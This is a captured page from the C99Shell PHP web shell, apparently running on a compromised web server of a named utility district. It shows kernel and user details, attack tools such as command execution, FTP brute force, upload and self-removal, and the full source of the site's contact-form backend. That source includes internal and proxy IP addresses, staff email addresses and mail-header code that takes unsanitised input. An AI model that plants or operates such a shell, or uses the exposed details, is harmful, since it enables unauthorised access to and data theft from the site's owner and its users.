!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/app/   drwxr-xr-x
Free 130.07 GB of 142.11 GB (91.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     backend.php (8.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
include('../admin/app/core.php');

// IP Addresses to assist in getting remote IP address
$proxy_int_ip "10.10.0.254";
$proxy_ext_ip "66.76.188.188";
$server_ip "10.10.0.4";

$target_email "website@trisud.com"// website group
$noreply "noreply@trisud.com"// no reply address
$company "Tri Special Utility District"// business name

// debug logging
$logForm "message";
$base_log_path "/var/www/app/logs/"// <== Note path must be correct!
//logThis($logForm, "backend.php", "Got here", false);




// actual program like stuff!
$remoteip get_client_ip();

// GET variables for ajax request handlers
$send $_REQUEST["send"];
$footer $_REQUEST['footer'];
$nav $_REQUEST['nav'];
$modal $_REQUEST['modal'];
$status $_REQUEST['status'];

if(
$status) {
    
$st status_read();
    echo 
$st['light'];
}


//FORMS

// ajax to send a contact msg from MAIN contact form
if($send == "contact")
      {
    
$name $_REQUEST["name"];  
    
$phone $_REQUEST["phone"]; 
    
$email $_REQUEST["email"];  
    
$msg $_REQUEST["message"]; 
    
//echo varDumpToString ($_REQUEST);
    //die();
    //contact msg only 
    
if(empty($name) || empty($phone) || empty($email) ||  empty($msg))
        {
        echo 
"Unable to send email, form is not completed!<br>";
        exit();
        }
    else
        {
        if(!
filter_var($emailFILTER_VALIDATE_EMAIL))
            {
            echo 
"Please provide a valid email address!<br>";
            exit();
            }
        if(
strlen($phone) < 10)
            {
            echo 
"Please provide a valid phone number (10 numbers)!<br>";
            exit();
            }
        
$to $target_email// Olympic website group
        //$to = 'stephenb@net-techs.com'; // testing
        
$subjectline 'Message from website contact form';
        
$body "From: ".$name."<br> E-Mail: ".$email."<br> Phone: ".$phone."<br> Message: ".$msg."<br> Sent by IP Address: ".$remoteip;
        
$headers = array(
            
'From: "'.$company.' Website Main Contact Form" <'.$noreply.'>' ,
            
'Reply-To: "'.$name.'" <'.$email.'>' ,
            
'X-Mailer: PHP/' phpversion() ,
            
'MIME-Version: 1.0' ,
            
'Content-type: text/html; charset=iso-8859-1' ,
            );  
        
$headers implode"\r\n" $headers );
        
$send_test1 mail($to$subjectline$body$headers);
        
logThis($logForm"contact-backend.php""\r\n".str_replace("<br>""\r\n"$body)."\r\n"false);
        }
    if(
$send_test1)
        {
        
$check "Your contact message was successfully sent!";
        }
    else
        {
        
$check "Something went horribly wrong! Please try again...";
        }
      echo 
$check;
      }

// ajax to send a contact msg from QUOTE contact form
if($send == "quote")
    {
    
//logThis($logForm, "backend.php", $_REQUEST, true);
    
$name $_REQUEST["name"];  
    
$phone $_REQUEST["phone"]; 
    
$email $_REQUEST["email"];  
    
$jobaddress $_REQUEST["jobaddress"];  
    
$incity $_REQUEST["incity"];  
    
$msg $_REQUEST["message"]; 

    
//contact msg only 
    
if(empty($name) || empty($email) || empty($phone) ||  empty($jobaddress))
        {
        echo 
"Unable to send email, form is not completed!<br>";
        exit();
        }
    else
        {
        if(!
filter_var($emailFILTER_VALIDATE_EMAIL))
            {
            echo 
"Please provide a valid email address!<br>";
            exit();
            }
        if(
strlen($phone) < 10)
            {
            echo 
"Please provide a valid phone number!<br>";
            exit();
            }
        
$to $target_email// Olympic website group
        //$to = 'stephenb@net-techs.com'; // testing
        
$subjectline 'Message from website contact form';
        
$body "From: ".$name."<br> E-Mail: ".$email."<br> Phone: ".$phone."<br>  Jobsite Address: ".$jobaddress."<br> City Limits: ".$incity."<br> Job Details: ".$msg."<br> Sent by IP Address: ".$remoteip;
        
$headers = array(
            
'From: "'.$company.' Website Main Contact Form" <'.$noreply.'>' ,
            
'Reply-To: "'.$name.'" <'.$email.'>' ,
            
'X-Mailer: PHP/' phpversion() ,
            
'MIME-Version: 1.0' ,
            
'Content-type: text/html; charset=iso-8859-1' ,
            );  
        
$headers implode"\r\n" $headers );
        
$send_test1 mail($to$subjectline$body$headers);
        
logThis($logForm"quote-backend.php""\r\n".str_replace("<br>""\r\n"$body)."\r\n"false);
        }
    if(
$send_test1)
        {
        
$check "Your message was successfully sent!";
        }
    else
        {
        
$check "Something went horribly wrong! Please try again...";
        }
    echo 
$check;
    }

// ajax to send a contact msg from MINI form
if($send == "mini")
    {
    
$name $_REQUEST["name"];  
    
$email $_REQUEST["email"];  
    
$msg $_REQUEST["message"]; 

    
//contact msg only 
    
if(empty($name) || empty($email) ||  empty($msg))
        {
        echo 
"Form is not completed!<br>";
        exit();
        }
    else
        {
        if(!
filter_var($emailFILTER_VALIDATE_EMAIL))
            {
            echo 
"Invalid email address!<br>";
            exit();
            }
        
$to $target_email// Olympic website group
        //$to = 'stephenb@net-techs.com'; // testing
        
$subjectline 'Message from website mini contact form';
        
$body "From: ".$name."<br> E-Mail: ".$email."<br> Message: ".$msg."<br> Sent by IP Address: ".$remoteip;
        
$headers = array(
            
'From: "'.$company.' Website Mini Contact Form" <'.$noreply.'>' ,
            
'Reply-To: "'.$name.'" <'.$email.'>' ,
            
'X-Mailer: PHP/' phpversion() ,
            
'MIME-Version: 1.0' ,
            
'Content-type: text/html; charset=iso-8859-1' ,
            );  
        
$headers implode"\r\n" $headers );
        
$send_test1 mail($to$subjectline$body$headers);
        
logThis($logForm"mini-backend.php""\r\n".str_replace("<br>""\r\n"$body)."\r\n"false);
        }
    if(
$send_test1)
        {
        
$check "Sent email successfully!";
        }
    else
        {
        
$check "Please try again...";
        }
    echo 
$check;
    }

// echo footer
if($footer)
    {
    
$footer file_get_contents("footer.ssi");
    echo 
$footer;
    }

// echo navigation
if($nav)
    {
    
$nav file_get_contents("nav.ssi");
    echo 
$nav;
    }

// echo modal for privacy policy
if($modal)
    {
    
$privacy file_get_contents("../privacy/privacy.ssi");
    echo 
$privacy;
    }






//FUNCTIONS

// tries to get valid client IP
function get_client_ip()
    {
    global 
$proxy_int_ip;
    global 
$proxy_ext_ip;
    global 
$server_ip;
    
// Nothing to do without any reliable information
    
if (!isset ($_SERVER['REMOTE_ADDR'])) 
        {
        return 
NULL;
        }

    
// Header that is used by the trusted proxy to refer to
    // the original IP
    
$proxy_header "HTTP_X_FORWARDED_FOR";

    
// List of all the proxies that are known to handle 'proxy_header'
    // in known, safe manner
    
$trusted_proxies = array($proxy_int_ip$proxy_ext_ip$server_ip);

    if (
in_array ($_SERVER['REMOTE_ADDR'], $trusted_proxies)) 
        {
        
// Get the IP address of the client behind trusted proxy
        
if (array_key_exists ($proxy_header$_SERVER)) 
            {
            
// Header can contain multiple IP-s of proxies that are passed through.
            // Only the IP added by the last proxy (last IP in the list) can be trusted.
            
$proxy_list explode (","$_SERVER[$proxy_header]);
            
$client_ip trim (end ($proxy_list));

            
// Validate just in case
            
if (filter_var ($client_ipFILTER_VALIDATE_IP)) 
                {
                return 
$client_ip;
                } 
            else 
                {
                
// Validation failed - beat the guy who configured the proxy or
                // the guy who created the trusted proxy list?
                // TODO: some error handling to notify about the need of punishment
                
}
            }
        }

    
// In all other cases, REMOTE_ADDR is the ONLY IP we can trust.
    
return $_SERVER['REMOTE_ADDR'];
    }

//writes to appropriate log file
function logThis($form$var$value$varArray false)
    {
    global 
$base_log_path;
    
$logFile $base_log_path.$form."_log_".date("Y-m-d").".log";
    if(
$varArray)
        {
        
$output "(".date("H:i:s").") ".$var.": ".varDumpToString($value);
        }
    else
        {
        
$output "(".date("H:i:s").") ".$var.": ".$value;
        }
    
file_put_contents($logFile$output."‭\n"FILE_APPEND);
    }


// var_dump for logs
function varDumpToString ($var){
          
ob_start();
          
var_dump($var);
          
$result ob_get_clean();
          return 
$result;
}


date_default_timezone_set('America/Chicago');
session_start();

////////////////////////////////////////////
// GENERAL FUNCTIONS
////////////////////////////////////////////

// db_connect function initiates a connection to the mysql database using the Global variables defined above



?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0118 ]--